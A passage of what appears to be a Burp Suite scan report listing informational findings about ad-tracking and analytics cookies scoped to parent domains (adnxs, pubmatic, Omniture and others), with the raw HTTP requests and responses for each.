u=5|0AQBbQRYAAAAAAQEAAQEAgA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Wed, 15-May-2013 01:58:28 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp&senduuid=0 HTTP/1.1
Host: html.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=801458892474636324; u=5|0AQBbQQcAAAAAAAEAAQEAgA%3D%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=801458892474636324; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Sat, 14-May-2016 01:58:28 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0AQBbQRYAAAAAAQEAAQEAgA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Wed, 15-May-2013 01:58:28 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 301
Date: Mon, 16 May 2011 01:58:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<meta http-equiv="pragma" content="no-cache">
</head>

<body style="border: 0; margin: 0
...[SNIP]...

12.34. http://ib.adnxs.com/pxj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x]%)u#^pig7$W[c#Nv?q+O.JNoCKfhpfg<W>HN)-UcZc-g744:f]Q3h-dMq!LfS)mzD6/H@3Kt9A; path=/; expires=Sun, 14-Aug-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=52&seg=95287&action=setuid%28%27c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4%27%29 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=3420415245200633085; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x]%)u#^pig7$W[c#Nv?q+O.JNoCKfiZd4ce5HN)-UcZc-g744:f]Q3h-dMq!LfS)mzD6/H<4e4)3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x]%)u#^pig7$W[c#Nv?q+O.JNoCKfhpfg<W>HN)-UcZc-g744:f]Q3h-dMq!LfS)mzD6/H@3Kt9A; path=/; expires=Sun, 14-Aug-2011 02:01:43 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 16 May 2011 02:01:43 GMT

GIF89a.............!.......,........@..L..;

12.35. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LUMbNT^``36WBKNk$WP)de8$iTmo^7XF%v'pP8UM*I8%X*/H049O+eCS(_pxE%YoD5>1HNf9<k.EsKoj%t4y%gVr2X^rA]u3E$43<; path=/; expires=Sun, 14-Aug-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=127155&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=3420415245200633085; anj=Kfu=8fG7DHCxrx)0s]#%2L_'x%SEV/hnK)x]%)u#^pig7$W[c#Nv?q+O.JNoCKfiZd4ce5HN)-UcZc-g744:f]Q3h-dMq!LfS)mzD6/H<4e4)3

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LUMbNT^``36WBKNk$WP)de8$iTmo^7XF%v'pP8UM*I8%X*/H049O+eCS(_pxE%YoD5>1HNf9<k.EsKoj%t4y%gVr2X^rA]u3E$43<; path=/; expires=Sun, 14-Aug-2011 02:02:24 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Mon, 16 May 2011 02:02:24 GMT
Content-Length: 0

12.36. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271; domain=.interclick.com; expires=Sun, 16-May-2021 02:01:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=cab0b2f4-a675-49e9-abc7-97bd867f44f5&cacheBust=1305510841 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271; domain=.interclick.com; expires=Sun, 16-May-2021 02:01:00 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 16 May 2011 02:01:00 GMT

GIF89a.............!.......,...........D..;

12.37. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837; domain=pubmatic.com; expires=Thu, 15-May-2014 01:53:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTE5MjgmdGw9NDMyMDA=&piggybackCookie=uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PUBMDCID=2; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; pubtime_27159=TMC; PMDTSHR=; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.22328.18842.49076.13450.; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; pubfreq_27159=165-1; KRTBCOOKIE_27=1216-110; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:55 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837; domain=pubmatic.com; expires=Thu, 15-May-2014 01:53:57 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

12.38. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=h9P0NJpwHg02FkwBdbdBJcgohXQCbaICPfgBwB; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/
GUID=MTMwNTU0MjQ5NzsxOjE2c2txbW0wbDE1dnAxOjM2NQ; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=tosh_cs=1&betq=7046=395215 HTTP/1.1
Host: leadback.advertising.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?
Cookie: ACID=gz150013044372470058; F1=B0bSJ3EBAAAABAAAAMAAgEA; BASE=23QqCCTy8s/uR9O!; ROLL=dtg1eliDxJrcjKM!; aceRTB=rm%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Cam%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Cdc%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Can%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7Crub%3DThu%2C%2009%20Jun%202011%2014%3A21%3A08%20GMT%7C; C2=gvmyNJpwIg02FAHCdbdBwhgohXAc; GUID=MTMwNTExMTUyMDsxOjE2c2txbW0wbDE1dnAxOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 10:41:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://ad.yieldmanager.com/pixel?id=563479&t=2
Set-Cookie: C2=h9P0NJpwHg02FkwBdbdBJcgohXQCbaICPfgBwB; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/
Set-Cookie: GUID=MTMwNTU0MjQ5NzsxOjE2c2txbW0wbDE1dnAxOjM2NQ; domain=advertising.com; expires=Wed, 15-May-2013 10:41:37 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 16 May 2011 11:41:37 GMT
Content-Length: 0

12.39. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

pluto2=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
lyc=AQAAAAEAAKAAAFCgByAAA+o2AAA=; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
pluto=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=20480;evt=12869;cat1=14057;cat2=14058 HTTP/1.1
Host: media.fastclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=5549709383580.878?

Response

HTTP/1.1 302 Redirect
Date: Mon, 16 May 2011 10:41:38 GMT
Set-Cookie: pluto2=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=xY9oCKaH0wEQmpS17AM&guid=ON&script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=AQAAAAEAAKAAAFCgByAAA+o2AAA=; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT
Set-Cookie: pluto=079565600014; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 10:41:38 GMT

12.40. http://media.gnc.com/ipixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gnc.com
Path:	/ipixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PrefID=41-1015464695; expires=Wed, 15 May 2013 13:58:34 GMT; path=/; domain=.gnc.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipixel?spacedesc=1087272_1061349_1x1_1061349_1061349&target=_blank&db_afcr=123&group=GNC&event=Homepage&random=1305510847078&te_siteid=76&te_pagetype=home&REVENUE=&USERID=125602265854&ORDERID=&PRODUCTID=&CATEGORYID=0&REFERRER=&CARTVALUE=&CARTQTY= HTTP/1.1
Host: media.gnc.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1305510199864%7C1308102199864%3B%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20gpv_p6%3DHome%2520Page%7C1305511999868%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; PrefID=41-1015464695; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; mt.v=1.1817838745.1305510198897

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=41-1015464695; expires=Wed, 15 May 2013 13:58:34 GMT; path=/; domain=.gnc.com
Content-Type: text/html
Content-Length: 31
Connection: close

<HTML><BODY>

</BODY></HTML>

12.41. http://media.gsimedia.net/ipixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gsimedia.net
Path:	/ipixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PrefID=22-662078189; expires=Wed, 15 May 2013 13:56:27 GMT; path=/; domain=.gsimedia.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipixel?spacedesc=1087320_1061349_1x1_1061349_1061349&target=_blank&db_afcr=123&group=ACE&event=Homepage&random=1305510836880&te_siteid=133&te_pagetype=home&REVENUE=&USERID=125602208394&ORDERID=&PRODUCTID=&CATEGORYID=0&REFERRER=&CARTVALUE=&CARTQTY= HTTP/1.1
Host: media.gsimedia.net
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PrefID=22-662078189

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:27 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=22-662078189; expires=Wed, 15 May 2013 13:56:27 GMT; path=/; domain=.gsimedia.net
Content-Type: text/html
Content-Length: 30
Connection: close

<HTML><BODY>

</BODY></HTML>

12.42. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.brookstone.com
Path:	/b/ss/bstoneprod/1/H.21/s01194140000734

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26E842E7051D1631-40000143C001ABA1[CE]; Expires=Sat, 14 May 2016 02:02:54 GMT; Domain=.brookstone.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/bstoneprod/1/H.21/s01194140000734?AQB=1&ndh=1&t=15/4/2011%2020%3A55%3A9%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=homepage&g=http%3A//www.brookstone.com/&cc=USD&h1=homepage&c4=homepage&v11=New&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acategory_root%5E%5E%28%272%27%29&v16=First%20Visit&c20=3330&c21=2&c25=results&v28=navigation&v32=SEARCH%2BNAV&v44=Direct%20Load&v45=Direct%20Load&v46=N/A&v47=No%20Referrer&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1305510909785%7C1368582909785%3B%20s_lv%3D1305510909788%7C1400118909788%3B%20s_lv_s%3DFirst%2520Visit%7C1305512709788%3B%20s_vs%3D1%7C1305512709800%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:54 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E842E7051D1631-40000143C001ABA1[CE]; Expires=Sat, 14 May 2016 02:02:54 GMT; Domain=.brookstone.com; Path=/
Location: http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s01194140000734?AQB=1&pccr=true&vidn=26E842E7051D1631-40000143C001ABA1&&ndh=1&t=15/4/2011%2020%3A55%3A9%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=homepage&g=http%3A//www.brookstone.com/&cc=USD&h1=homepage&c4=homepage&v11=New&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acategory_root%5E%5E%28%272%27%29&v16=First%20Visit&c20=3330&c21=2&c25=results&v28=navigation&v32=SEARCH%2BNAV&v44=Direct%20Load&v45=Direct%20Load&v46=N/A&v47=No%20Referrer&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 02:02:54 GMT
Last-Modified: Tue, 17 May 2011 02:02:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www430
Content-Length: 0
Content-Type: text/plain

12.43. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.gnc.com
Path:	/b/ss/gsicgncf/1/H.20.3/s35472931402100

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26E8810485163B23-40000183E0155674[CE]; Expires=Sat, 14 May 2016 10:52:57 GMT; Domain=.gnc.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/gsicgncf/1/H.20.3/s35472931402100?AQB=1&ndh=1&t=16/4/2011%205%3A52%3A55%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp%3Frdir%3D1A&r=http%3A//burp/show/8&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?rdir=1A
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_cc%3Dtrue%3B; s_pers=%20s_nr%3D1305543175232%7C1308135175232%3B%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20gpv_p6%3DHome%2520Page%7C1305544975234%3B

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:52:57 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E8810485163B23-40000183E0155674[CE]; Expires=Sat, 14 May 2016 10:52:57 GMT; Domain=.gnc.com; Path=/
Location: http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s35472931402100?AQB=1&pccr=true&vidn=26E8810485163B23-40000183E0155674&&ndh=1&t=16/4/2011%205%3A52%3A55%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp%3Frdir%3D1A&r=http%3A//burp/show/8&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=Site%20Navigation&c4=Internal%20Domain&c5=New&c6=First%20page%20view%20or%20cookies%20not%20supported&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 15 May 2011 10:52:57 GMT
Last-Modified: Tue, 17 May 2011 10:52:57 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www431
Content-Length: 0
Content-Type: text/plain

12.44. http://metrics.petsmart.com/b/ss/gsicpet/1/H.20.3/s38054509394851 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.petsmart.com
Path:	/b/ss/gsicpet/1/H.20.3/s38054509394851

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi=[CS]v1|26E880B4050116FC-60000108C015DA82[CE]; Expires=Sat, 14 May 2016 10:50:16 GMT; Domain=.petsmart.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

